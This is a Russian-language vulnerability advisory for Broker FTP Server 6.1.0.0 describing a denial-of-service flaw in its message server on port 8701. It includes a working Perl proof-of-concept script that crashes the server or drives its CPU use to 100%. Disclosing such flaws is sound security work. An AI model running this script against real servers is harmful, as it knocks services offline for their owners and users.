| Дата публикации: | 15.02.2004 |
| Всего просмотров: | 1365 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Broker FTP Server 6.1.0.0
Описание: Две уязвимости обнаружены в Broker FTP server. Удаленный пользователь может аварийно завершить работу FTP сервера или заставить систему использовать 100% CPU. Удаленный пользователь может подключится и затем сразу отключится от Broker FTP server Message Server (8701 порт по умолчанию), чтобы аварийно завершить работу FTP сервера. Также сообщается, что удаленный пользователь может подключится к message server и не посылая никаких данных оставить подключение открытым, чтобы заставить процесс TsFtpSrv.exe использовать 100% CPU. Пример/Эксплоит:
#!/usr/bin/perl -w
# TransSoft Broker FTP Server DoS (CPU usage and Exception)
use Socket;
if (not $ARGV[0]) {
print qq~
Usage: pfdos.pl < host>
~;
exit;}
$ip=$ARGV[0];
print "host: " . $ip . "\n\n";
sendexplt("A");
sub sendexplt {
my ($pstr)=@_;
$target= inet_aton($ip) || die("inet_aton
problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,8701,$target)){
select(S);
$|=1;
print $pstr;
sleep 100;
close(S);
} else { die("Can't connect...\n"); }
URL производителя: http://www.ftp-broker.com/view_content.asp?ID=7 Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Broker FTP DoS (Message Server) |